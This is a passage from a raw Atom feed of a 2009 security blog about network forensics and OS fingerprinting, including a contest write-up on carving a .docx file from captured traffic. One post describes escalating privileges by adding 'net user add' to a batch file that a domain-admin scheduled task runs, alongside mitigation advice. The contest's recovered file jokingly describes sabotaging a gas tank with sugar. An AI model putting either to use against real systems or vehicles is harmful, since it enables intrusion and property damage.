Saving raw this way keeps "extra" info in the file, which we will need to remove with some file carving next.&lt;br /&gt;&lt;br /&gt;We now know, or appear to know, the type of file it is based on the file name above.  We need to look up that magic number.  A .docx file really is a zip file, so it has the same magic number, which is:  50 4B 03 04 14 00 06 00&lt;br /&gt;&lt;br /&gt;We now open up the file we saved in a hex editor and do a search for the above magic number.  Once we find it we delete anything prior to it and resave the file.  There is always the chance that there will be extra junk at the end too that may need to be carved off.&lt;br /&gt;&lt;br /&gt;After that, we can open up the file with OpenOffice or Microsoft Word and see what the data is.  We could also unzip it instead and look at the .xml files generated if we need to find out more about the initial file.&lt;br /&gt;&lt;br /&gt;Run the file through your choice of md5sum programs and you should be good to go. &lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Below are the notes I took while I went through the system; typically I wouldn't put them in a report, but there were a few interesting pieces of info in there.&lt;br /&gt;&lt;br /&gt;Extra info and general notes on systems on the network and what they appear to do:&lt;br /&gt;&lt;br /&gt;192.168.1.2   - Linux 2.6 possibly, limited info, did what may have been a scan of 192.168.1.157.  
Connected on port 80, but just did a handshake and said goodbye, no header info exchanged.&lt;br /&gt;192.168.1.10  - default gateway I assume&lt;br /&gt;192.168.1.30  - NTP Client Box, running SSH server (192.169.1.2 connected to it)&lt;br /&gt;192.168.1.157 - running Samba 2.2.7 - 3.0.x client (actually 3.2.0, need to update Satori)&lt;br /&gt;    print queue&lt;br /&gt;    HTTP Server, or at least port 80 is open&lt;br /&gt;    Herbivore/SANS&lt;br /&gt;192.168.1.158 - Linux 2.4 or 2.6 box, packet 92 starts sending recipe.docx, packet 112 using cool filexfer sends it also&lt;br /&gt;    NTP Client&lt;br /&gt;    Talking to 64.12.24.50, most likely sec558user1&lt;br /&gt;    FTPs file to 192.168.1.159, syn comes in in packet 109&lt;br /&gt;192.168.1.159 - Windows XP, 2000 or 2003 box (XP based on Web)&lt;br /&gt;     talking to 64.12.25.91&lt;br /&gt;     downloads zip file of smiley faces from 205.188.13.12&lt;br /&gt;     goes off to at.atwola.com, requesting DNS info for them after download of resume.doc&lt;br /&gt;    pulled file (httpget) with:  (removed since it was actually linking to the ad in this post!)&lt;br /&gt;    pulled file (httpget) with:  (removed since it may have linked to ad also).&lt;br /&gt;    "username" on cookie:  JEB2=4A839DDB6E65181C45921CB2F00016D8; ATTACID=a3Z0aWQ9MTU4NzdpYTAwYTh2Ymk=; ATTAC=a3ZzZWc9OTk5OTk6NTAyODA=; badsrfi=V0d710994e8ccb8db64a83a07939b2; atdemo=a3ZhZz1hbTM6dWEzOTtrdnVnPTE7; AxData=; atdses=0&lt;br /&gt;    atwola.com appears to be "spyware/adware" based on a quick search&lt;br /&gt;&lt;br /&gt;External Hosts&lt;br /&gt;64.12.24.50 - bos-m013a-sdr3.blue.aol.com&lt;br /&gt;64.12.25.91 - bos-m007c-sdr4.blue.aol.com&lt;br /&gt;64.236.68.245 (dns requested info by 192.168.1.159)&lt;br /&gt;64.236.68.246 (dns requested info by 192.168.1.159)&lt;br /&gt;205.188.13.12 - no DNS entry, only talking to 192.168.1.159 via SSL), downloaded a zipped file of smile faces and their manifest.&lt;br /&gt;10.1.1.20 - DNS server, NTP 
Server&lt;br /&gt;&lt;br /&gt;Clear text data, (192.168.1.158 to 64.12.24.50) (owned by AOL, so possibly AIM traffic)&lt;br /&gt;E4628778....Sec558user1&lt;br /&gt;Here's the secret recipe... I just downloaded it from the file server. Just copy to a thumb drive and you're good to go &amp;gt;:-)&lt;br /&gt;E4628778....Sec558user1*..c.z.........&lt;br /&gt;G7174647....Sec558user1.......R..7174647..F.CL...."DEST.......................F.........'...........recipe.docx.*.V......&lt;br /&gt;G7174647....Sec558user1*.V..{.......*..&lt;br /&gt;7174647....Sec558user1..............J.H.........+..1n....+...O............J.........7174647..F.CL...."DEST.......*.V..".......*.1...........&lt;br /&gt;Sec558user1..*.V..........*.y..N....w...&lt;br /&gt;Sec558user1..............J.H.........+..1n....+...O............J......a........X....&lt; HTML &gt;&lt; BODY &gt;&lt; FONT FACE="Arial" SIZE=2 COLOR=#000000&gt;thanks dude&lt; /FONT&gt;&lt; /BODY&gt;&lt; /HTML &gt;.&lt;br /&gt;......+..1n....+...O.........*.V..".......*.............Sec558user1..*.V..........+.Q.....L.....Sec558user1..............J.H.........+..1n....+...O............J......s........j....&lt; HTML &gt;&lt; BODY&gt;&lt; FONT FACE="Arial" SIZE=2 COLOR=#000000&gt;can't wait to sell it on ebay&lt; /FONT&gt;&lt; /BODY&gt;&lt; /HTML &gt;&lt;br /&gt;............Sec558user1..*.V..".......+.............Sec558user1..*..d.".........H...........Sec558user1..*..e.J.........&lt;br /&gt;I5088496....Sec558user1..."................see you in hawaii!....*..f.".........J...........Sec558user1..*.V......&lt;br /&gt;&lt;br /&gt;DOCX (zip) Magic Number: &lt;br /&gt;50 4B 03 04           PK..&lt;br /&gt;ZIP           PKZIP archive file (Ref. 1 | Ref. 
2)&lt;br /&gt;Trailer: filename 50 4B 17 characters 00 00 00&lt;br /&gt;Trailer: (filename PK 17 characters ...)&lt;br /&gt;DOCX, PPTX, XLSX           Microsoft Office Open XML Format Document&lt;br /&gt;JAR           Java archive; compressed file package for classes and data&lt;br /&gt;SXC, SXD, SXI, SXW           OpenOffice spreadsheet, drawing, presentation, and text files&lt;br /&gt;WMZ           Windows Media compressed skin file&lt;br /&gt;XPI           Mozilla Browser Archive&lt;br /&gt;XPT           eXact Packager Models&lt;br /&gt;&lt;br /&gt;50 4B 03 04 14 00 06 00           PK......&lt;br /&gt;DOCX, PPTX, XLSX           Office 2007 documents&lt;br /&gt;&lt;br /&gt;Use Follow TCP Stream, just get one side of conversation.  Save as Raw.  Lookup "magic number"&lt;br /&gt;Search for it in Saved file.  Delete everything prior to that and resave, get:&lt;br /&gt;&lt;br /&gt;Recipe for Disaster:&lt;br /&gt;1 serving&lt;br /&gt;Ingredients:&lt;br /&gt;4 cups sugar&lt;br /&gt;2 cups water&lt;br /&gt;In a medium saucepan, bring the water to a boil. Add sugar. Stir gently over low heat until sugar is fully dissolved. Remove  the  saucepan from heat.  Allow to cool completely. Pour into gas tank. 
Repeat as necessary.&lt;br /&gt;&lt;br /&gt;Hash on the File is:&lt;br /&gt;8350582774E1D4DBE1D61D64C89E0EA1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-6393541195992133042?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6393541195992133042/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6393541195992133042' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6393541195992133042'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6393541195992133042'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/09/network-forensics-contest-results.html' title='Network Forensics Contest Results'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-1624922693005973663</id><published>2009-09-24T19:30:00.005-06:00</published><updated>2009-09-25T07:00:14.793-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='dhcp fingerprinting'/><category scheme='http://www.blogger.com/atom/ns#' term='Fingerprint Editor'/><title type='text'>Updated Fingerprint Programs</title><content type='html'>Jeff has done a great job making it easy to update the different xml files I use in Satori, along with the ability to have an underlying repository that helps keep everything the same across 
all of the files!  He's also written a nice DHCP Fingerprinting program himself.  These can be found at &lt;a href="http://pagesperso-orange.fr/cycocrew/delphi/applications.html"&gt;Devonic Delphi Page&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;DHCP Fingerprint Manager:  imports text-based Wireshark traces to populate and fingerprint systems.  Basically, you take a pcap file, parse out just the DHCP packets and export to a text file.  You then dump that in and dhcp fingerprint the systems.&lt;br /&gt;&lt;br /&gt;It is a lot faster than Satori and it gives you a lot of nice features after you are done.  The Statistics feature is a wonderful little chunk of it that you can run after reading in a file.  I may have to steal some ideas from him on this!  In the statistics area it breaks down % of End Systems by MAC Vendors, Fingerprint Names, Fingerprint Match Scores, OS Names, OS Classes, OS Vendors, Device Types, Device Vendors, and then the Authors of the individual Fingerprints.&lt;br /&gt;&lt;br /&gt;Fingerprint Editor: The program I use all the time these days to modify the different xml files that Satori and these different programs are using.  I used to always do it by hand, but inevitably I always missed updating something.  It was nice to have this to help keep things in sync, update the time stamps, etc!  If you are creating fingerprints to send me, and not just sending me the raw data, this is the perfect program to use!&lt;br /&gt;&lt;br /&gt;There is also a DEF File Editor that modifies the definition files the programs above use.&lt;br /&gt;&lt;br /&gt;He has quite a few other nice programs out there, and if any of you are delphi programmers check out his &lt;a href="http://pagesperso-orange.fr/cycocrew/delphi/components.html"&gt;Delphi Components page&lt;/a&gt;.  
I used a few pieces from there myself.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-1624922693005973663?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/1624922693005973663/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=1624922693005973663' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1624922693005973663'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1624922693005973663'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/09/updated-fingerprint-programs.html' title='Updated Fingerprint Programs'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3091554119388969883</id><published>2009-09-11T17:37:00.002-06:00</published><updated>2009-09-11T17:51:06.355-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='meraki'/><category scheme='http://www.blogger.com/atom/ns#' term='coovachilli'/><category scheme='http://www.blogger.com/atom/ns#' term='dhcp fingerprinting'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><title type='text'>Gaining ground?</title><content type='html'>2 blogs talking about DHCP fingerprinting in 2 days, not bad.  
The 2nd one may have been inspired by the first since it links to it, but it also has a link to my BH briefing, so hey, I can't complain.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://meraki.com/blog/2009/09/10/os-fingerprinting/"&gt;Meraki&lt;/a&gt; did the first one yesterday.  (I love Google Alerts.)  I've tried to contact Hans about what they are doing (option55 data only, or more like I'm doing with the &lt;a href="http://dhcpfingerprinting.blogspot.com/"&gt;dhcp.xml file&lt;/a&gt;), so far I haven't heard anything back, but it was a Friday.  We'll see if I get any response or not.  If anyone has a POC for Meraki maybe check into it for me.&lt;br /&gt;&lt;br /&gt;The second blog was from &lt;a href="http://www.coova.org/node/3519"&gt;coova.org&lt;/a&gt;.  They have a link to David's and my &lt;a href="http://myweb.cableone.net/xnih/download/bh-japan-laporte-kollmann-v8.ppt"&gt;Blackhat Presentation from 2007&lt;/a&gt; for those that haven't looked at it before.  He mentions a product CoovaRADIUS which I hadn't heard of before (nor had I heard of Meraki for that matter).  It appears CoovaRADIUS can do dhcp fingerprinting via CoovaChilli.  They appear to be using the packetfence data, so just option55 without taking into account if it is a Request/Discover/Offer/Inform/etc packet.  May have to try to get a hold of the developer there too and see if they are interested in trying to use the dhcp.xml file.  
Always good to get more people using it, thereby expanding the database as more people have access to more devices.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-3091554119388969883?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3091554119388969883/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3091554119388969883' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3091554119388969883'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3091554119388969883'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/09/gaining-ground.html' title='Gaining ground?'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-5826053330139231474</id><published>2009-09-07T10:59:00.005-06:00</published><updated>2009-09-14T17:06:34.277-06:00</updated><title type='text'>Great Dataset to parse through by ITOC</title><content type='html'>ITOC has a great set of data to parse through for those that are interested:&lt;br /&gt;&lt;a href="http://www.itoc.usma.edu/research/dataset/index.html"&gt;http://www.itoc.usma.edu/research/dataset/index.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Just over 8 GB of data between inside/outside captures.&lt;br /&gt;&lt;br /&gt;They also have a blog setup:&lt;br /&gt;&lt;a 
href="http://datasetsfortheresearchcommunity.blogspot.com/"&gt;http://datasetsfortheresearchcommunity.blogspot.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I'm hoping for some more information on exact OS's being released so that I can take the data that Satori spit out and use that to extend the fingerprints on FreeBSD and possibly some of the other OS's seen on the network.  I'd hate to just take and put it under the generic FreeBSD if we can tell for sure it was 7.0 or whatever.&lt;br /&gt;&lt;br /&gt;Satori already has ID'd the systems, quite well from their initial diagram, but it would be nice to know for sure that it is correct before extending some of the fingerprints!&lt;br /&gt;&lt;br /&gt;One problem I'm having is that it takes forever to go through 1 GB files with Satori.  Some of it has to do with the amount of "stuff" I've added to it, but that is just a lot of data to parse too!  Oh well, 1-2 hours per file, come back, see if it blew up, etc.  (Update:  Make that 1-2 hours on the 100 MB files, not sure how many days to get through the 1 GB files!)  This data set at least gave me some new packets that I hadn't seen before that caused some problems, so I updated a few of the dlls to handle vlan traffic in them.  
I was feeding it in, just not parsing it correctly!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-5826053330139231474?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/5826053330139231474/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=5826053330139231474' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/5826053330139231474'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/5826053330139231474'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/09/great-dataset-to-parse-through-by-itoc.html' title='Great Dataset to parse through by ITOC'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-1947281607055204591</id><published>2009-08-22T13:17:00.002-06:00</published><updated>2009-08-22T13:21:41.314-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fingerprinting'/><category scheme='http://www.blogger.com/atom/ns#' term='telnet'/><title type='text'>Telnet Recon</title><content type='html'>Google Alert just popped this up on a program called &lt;a href="http://www.sectechno.com/2009/08/21/telnet-fingerprinting/"&gt;telnetrecon&lt;/a&gt;.  Telnetrecon is just that, a recon program for the telnet service.  It appears to be an active scanner.  
I have very few devices/systems with telnet open these days, so it isn't something I've tried out.  If anyone runs it let me know any feedback you have or feel free to add a post.&lt;br /&gt;&lt;br /&gt;Looks like it was initially released about a year ago.  Not sure how many additions have been made to it since.  Something that may come in useful to do some testing though.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-1947281607055204591?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://computec.ch/projekte/telnetrecon/?' title='Telnet Recon'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/1947281607055204591/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=1947281607055204591' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1947281607055204591'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1947281607055204591'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/08/telnet-recon.html' title='Telnet Recon'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6166693691795603332</id><published>2009-08-12T22:55:00.003-06:00</published><updated>2009-08-12T23:00:43.652-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ESX'/><category scheme='http://www.blogger.com/atom/ns#' 
term='software'/><title type='text'>Sayings that drive me crazy</title><content type='html'>Ok, nothing to do with OS Fingerprinting, but I've seen this comment twice this week and it drives me nuts:&lt;br /&gt;&lt;br /&gt;"Either way, ESX is just software and can suffer from&lt;br /&gt;vulnerabilities just like any other piece of software."&lt;br /&gt;&lt;br /&gt;Yes, 100% true, the above was when I asked if VM Escape had actually been shown in ESX, not just workstation/server.  Earlier this week, someone else said the same thing on a different security list in regards to trunked VLANs into an ESX box and that trusting VMware to do it in ESX was crazy and you should use a real Firewall because "ESX is just software... and has vulns in it".&lt;br /&gt;&lt;br /&gt;What do these security people think runs firewalls?  Let's see, a Cisco device runs IOS, IOS is software!  Better yet, Network Engineers put rules in FWs, NEs get lazy sometimes and put bad rules in them.  &lt;br /&gt;&lt;br /&gt;Give me a break, YES ESX is software, YES software has vulns in it, but everything we do on these lovely pieces of hardware we are sitting at requires software to run.  Even to boot them up there is software.  
What do you think the BIOS is!&lt;br /&gt;&lt;br /&gt;Ok enough ranting, but next time you hear someone say "It is just software, so it has vulns in it" smack them upside the head for me!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-6166693691795603332?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6166693691795603332/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6166693691795603332' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6166693691795603332'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6166693691795603332'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/08/sayings-that-drive-me-crazy.html' title='Sayings that drive me crazy'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3380049462125834758</id><published>2009-08-12T09:30:00.007-06:00</published><updated>2009-08-12T12:30:15.010-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fingerprinting'/><category scheme='http://www.blogger.com/atom/ns#' term='os fingerprinting'/><category scheme='http://www.blogger.com/atom/ns#' term='ICMP'/><title type='text'>ICMP OS Fingerprinting</title><content type='html'>Quite honestly I thought ICMP based OS Fingerprinting was dead and had 
been for years now that almost all OS's default to running a firewall!  I was quite surprised to see that NetScanTools Pro has an option in it to still do this.&lt;br /&gt;&lt;br /&gt;Happened to pick up an article from Laura Chappell, which had a link to this quicktime audio:  http://www.screencast.com/users/laurachappell/folders/Media%20Roll/media/75047d06-2801-49b7-87d3-0e41a3abd500&lt;br /&gt;&lt;br /&gt;NetscanPro appears to be doing the standard:&lt;br /&gt;ICMP Request&lt;br /&gt;Timestamp Request&lt;br /&gt;AddressMask Request&lt;br /&gt;Information Request&lt;br /&gt;ICMP Request (Code &lt;&gt; 0)&lt;br /&gt;TOS and Precedence  &lt;br /&gt;&lt;br /&gt;Without going back and reading Ofir's paper again, or looking at my old ICMP program, I'm not sure if any of them are new from what Ofir presented in his paper back in 2001 "ICMP Usage In Scanning" or not.  I wonder if LNSS is still using the Code &lt;&gt; 0 test at all?&lt;br /&gt;&lt;br /&gt;ICMP fingerprinting seems about the same as before.  Useful in some cases, not so useful in others.  It is good to see that it is still being used and therefore some new database has probably been made.&lt;br /&gt;&lt;br /&gt;Out of the 4 main types of devices on my network it identified them as [Actual - Identification]:&lt;br /&gt;Netgear WAP - HP Procurve Switch 2500 Series&lt;br /&gt;Brother Printer - Unable to identify operating system.&lt;br /&gt;Linksys VOIP Device - HP LaserJet 2800 Series&lt;br /&gt;XP - Windows XP responding to Ping only&lt;br /&gt;&lt;br /&gt;Ok, I had my box crash twice while doing OS Fingerprinting with this.  It could be a problem on my box or it could be a bad dissector on their end.  Will follow up with them. 
[note:  Kirk was quick on responses, looks like it was probably in WinpCap since the BSOD pointed at npf.sys, trying to duplicate on another system, may also be a NIC driver combination, looking into it, but doesn't appear to be NetScanTools related]&lt;br /&gt;&lt;br /&gt;Anyway, out of 4 devices it could ID 1 correctly.  Any fingerprinting program is only as good as its DB, so maybe I'll have to play with it a bit more and send it some new fingerprints if they have the ability to add them. [Note: Looks like the ability to add more will be in version 11, so I'll have to try to follow up with them in the future]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-3380049462125834758?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3380049462125834758/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3380049462125834758' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3380049462125834758'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3380049462125834758'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/08/icmp-os-fingerprinting.html' title='ICMP OS Fingerprinting'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4321559835642245230</id><published>2009-05-28T08:27:00.003-06:00</published><updated>2009-05-28T08:32:10.174-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='web fingerprinting'/><title type='text'>Web Fingerprinting</title><content type='html'>Fingerprinting web sites via the Server tag has been done for years (and years and years).  Then came fingerprinting it based on the order of responses (httprint).  Now something new (or at least new to me) has shown up, fingerprinting it based on certain files on the site.&lt;br /&gt;&lt;br /&gt;Article can be found &lt;a href="http://sucuri.net/?page=docs&amp;title=webapp-version-detection"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;In a nutshell:&lt;br /&gt;"What these fingerprints are, depend on the web application, but generally we can use .js (javascript) , .css and a few other files that are available and we can access the source remotely. We can't do the same with .php, because it will not return the source (only the executed output)."&lt;br /&gt;&lt;br /&gt;In their example they fingerprint wordpress sites.  
Interesting new approach.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-4321559835642245230?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4321559835642245230/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4321559835642245230' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4321559835642245230'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4321559835642245230'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/05/web-fingerprinting.html' title='Web Fingerprinting'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-2207597330228483229</id><published>2009-04-16T20:28:00.003-06:00</published><updated>2009-04-16T20:41:06.774-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Scheduled Tasks'/><category scheme='http://www.blogger.com/atom/ns#' term='AD'/><title type='text'>AD, Scheduled Tasks, and batch files</title><content type='html'>Ok, totally off subject for why I started this blog, but....&lt;br /&gt;&lt;br /&gt;Was looking at a bunch of Scheduled Tasks on a bunch of servers today, thinking about how, if configured incorrectly, Scheduled Jobs can be a major security hole.&lt;br /&gt;&lt;br /&gt;Take for example a scheduled job that accesses 
multiple systems.  Instead of setting up a specific account that has access to only "X" number of systems, a domain admin account is used.  There are many things wrong with this scenario, but I've seen it, and I'm sure others have too.  On top of this, let's assume that this scheduled job calls a batch file, instead of an exe directly (though this could also be used in this type of attack).  &lt;br /&gt;&lt;br /&gt;If you go in to modify a scheduled job, the file it points to, the time it runs, etc, Windows prompts you for the password again.  All well and good, but instead of modifying the job, you just look to see what it points at and who it is run as.&lt;br /&gt;&lt;br /&gt;In this case, a batch file, setup to run as a domain admin.  Go in, modify the batch file, put some things like "net user add" in there or your favorite command line utility (for that matter a GUI utility) and go back into scheduled tasks and say run.  You've now escalated from a normal user, on this system, to whatever you want!  This assumes you have some type of access to the system in the first place and all that goes with that.&lt;br /&gt;&lt;br /&gt;Moral of the story:&lt;br /&gt;1.  Don't run tasks as Domain Admins, practice the whole least priv ideology.&lt;br /&gt;2.  If you must run things via Scheduled Tasks, the files you are calling should be in a directory that is locked down by an ACL that only allows the user calling them access to them.&lt;br /&gt;&lt;br /&gt;It would be nice if MS added some type of checksum to the files called.  
When you create the job have it run a checksum against the file it is to run and to verify that each time it runs the process.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-2207597330228483229?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/2207597330228483229/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=2207597330228483229' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2207597330228483229'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2207597330228483229'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/04/ad-scheduled-tasks-and-batch-files.html' title='AD, Scheduled Tasks, and batch files'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-7698135810020143187</id><published>2009-04-16T19:54:00.005-06:00</published><updated>2009-04-16T20:41:56.951-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SNMP'/><title type='text'>The forgotten power of SNMP</title><content type='html'>I keep wondering when the next big breakthrough will come and from where.  Most protocols have been done, tricks have been played, and now it is a lot of rehashing of old tricks.  
